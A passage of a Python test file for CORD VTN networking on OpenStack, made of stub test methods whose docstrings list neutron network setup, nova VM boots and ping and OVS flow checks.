$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside (internet) network (global ping).
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside (internet) network (global ping).
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside (internet) network (global ping).
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside (internet) network (global ping).
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from an outside (internet) network (global ping).
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_connectivity_from_compute_node_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM was launched.
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM was launched.
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM was launched.
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_image_connectivity_from_compute_node_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM was launched.
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_image_connectivity_from_compute_node_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping the VM from the compute node on which the VM was launched.
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_private_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and a private ip on the VM.
8) Create the same virtual interface with vlan tag and a private ip on the head node.
9) Now ping the VM from the head node, where the openstack services are launched.
10) Verify that ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_public_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and a public ip on the VM.
8) Create the same virtual interface with vlan tag and any public ip on the head node.
9) Now ping the VM from the head node, where the openstack services are launched.
10) Verify that ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and a local management ip on the VM.
8) Create the same virtual interface with vlan tag and any local management ip on the head node.
9) Now ping the VM from the head node, where the openstack services are launched.
10) Verify that ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_private_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and a private floating ip on the VM.
8) Create the same virtual interface with vlan tag and a private floating ip on the head node.
9) Now ping the VM from the head node, where the openstack services are launched.
10) Verify that ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_public_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and a public floating ip on the VM.
8) Create the same virtual interface with vlan tag and any public floating ip on the head node.
9) Now ping the VM from the head node, where the openstack services are launched.
10) Verify that ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and a local management floating ip on the VM.
8) Create the same virtual interface with vlan tag and any local management floating ip on the head node.
9) Now ping the VM from the head node, where the openstack services are launched.
10) Verify that ping is successful.
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_public_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the private network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_local_management_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the private network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_vlan_connectivity_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the private network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_floating_IP_with_vlan_connectivity_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the private network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_local_management_other_public_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_vlan_connectivity_other_public_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_floating_IP_with_vlan_connectivity_other_public_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_vlan_connectivity_other_local_management_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_floating_IP_with_vlan_connectivity_other_local_management_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_floating_IP_with_vlan_connectivity_other_virtual_vlan_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
